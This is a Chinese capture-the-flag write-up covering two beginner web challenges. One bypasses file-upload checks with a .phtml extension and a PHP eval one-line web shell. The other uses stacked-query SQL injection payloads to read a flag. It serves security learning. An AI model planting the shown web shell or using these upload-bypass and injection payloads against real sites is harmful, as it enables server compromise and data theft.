[ACTF2020 新生赛]Upload 1
上传一个普通的txt文件,发现只有图像类型的文件才能传上去,看看有没有前端的检验,看看源码,发现有一个onsubmit:“return checkFIle()”
的动作和函数,把他删掉就可以上传普通的txt文件
上传一个一句话木马,发现被ban了,猜测有后端的检测
尝试更改文件后缀名来绕过,于是发现.phtml后缀可以绕过
用蚁剑连接来得到flag
<script language="php">eval($_POST['shell']);</script>
<?php echo"123";?
知识点:
1.查看前端是否有js进行文件名检测
2.后端可以用.phtml文件后缀名进行绕过
[SUCTF 2019]EasySQL 1
输入1有回显,输入a则没有回显
输入1’ order by 3#会显出Nonono
之后试了布尔盲注,发现打啥都会返回Nonono
连1’ or 1=1#和 1’ and length(database())>=1#都返回Nonono,布尔盲注死了
试一下堆叠注入
发现1; show databases#
和1;show tables#
可以
看看flag能不能显示1;show columns from Flag;#
,嗐,果然不行
我以为它很easy,结果它不easy,搞得我很crazy
比较详细的wp
看了wp之后,payload为*;1
即可,原来他说的easy是指打的东西很easy吗……